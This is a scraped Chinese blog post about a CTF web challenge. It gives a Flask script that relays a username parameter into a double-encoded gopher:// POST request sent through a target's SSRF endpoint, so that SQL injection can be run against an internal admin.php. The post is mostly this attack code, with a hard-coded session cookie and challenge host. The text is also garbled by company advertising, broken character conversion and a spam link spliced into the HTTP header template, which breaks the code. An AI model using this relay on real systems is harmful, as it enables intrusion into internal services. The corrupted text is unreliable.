Python中怎么使用Flask實現(xiàn)中轉注入，針對這個問題，這篇文章詳細介紹了相對應的分析和解答，希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

站在用戶的角度思考問題，與客戶深入溝通，找到竹山網(wǎng)站設計與竹山網(wǎng)站推廣的解決方案，憑借多年的經(jīng)驗，讓設計與互聯(lián)網(wǎng)技術結合，創(chuàng)造個性化、用戶體驗好的作品，建站類型包括：網(wǎng)站設計制作、成都網(wǎng)站建設、企業(yè)官網(wǎng)、英文網(wǎng)站、手機端網(wǎng)站、網(wǎng)站推廣、國際域名空間、雅安服務器托管、企業(yè)郵箱。業(yè)務覆蓋竹山地區(qū)。

1、常常會因為構造網(wǎng)絡請求麻煩

2、寫tamper嫌麻煩

這時候我們的中轉注入就來了，這有一個Web題需要我們頻繁構造gopher去實現(xiàn)POST或者GET請求，這時候如果我們想要實現(xiàn)更自由的SQL注入，便可使用

from flask import Flask,request

from urllib.parse import quote

import requests

def urlencode(s):

res=''

for c in s:

fuck=hex(ord(c)).split('0x')[1]

if len(fuck)==1:

fuck='0'+fuck

res+="%"+fuck

return res

fuckhtml='''POST /admin.php HTTP/1.1

Host: 127.0.0.1

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: {length}北海購房網(wǎng) http://bh.goufang.com/

username={username}&password=129581926211651571912466741651878684928'''.replace("\n","\r\n")

tmpPayload= fuckhtml.split("\r\n")[-1]

tmplength = len(tmpPayload) - len('{username}')

url="http://eci-2zehhuwx9m3o88h42zup.cloudeci1.ichunqiu.com/ssrf.php?way=gopher%3A%2F%2F127.0.0.1:80%2F_"

app = Flask(__name__)

@app.route('/')

def hello_world():

username=request.args.get('username')

shit=fuckhtml.format(username=username,length=str(tmplength+len(username)))

cookies={'PHPSESSID':'qitbcj1puicm4qcpf8oe1fgc17'}

page=requests.get(url+urlencode(urlencode(shit)),proxies={'http':'http://127.0.0.1:8081'},cookies=cookies).text

return page

if __name__ == '__main__':

app.run()

關于Python中怎么使用Flask實現(xiàn)中轉注入問題的解答就分享到這里了，希望以上內容可以對大家有一定的幫助，如果你還有很多疑惑沒有解開，可以關注創(chuàng)新互聯(lián)行業(yè)資訊頻道了解更多相關知識。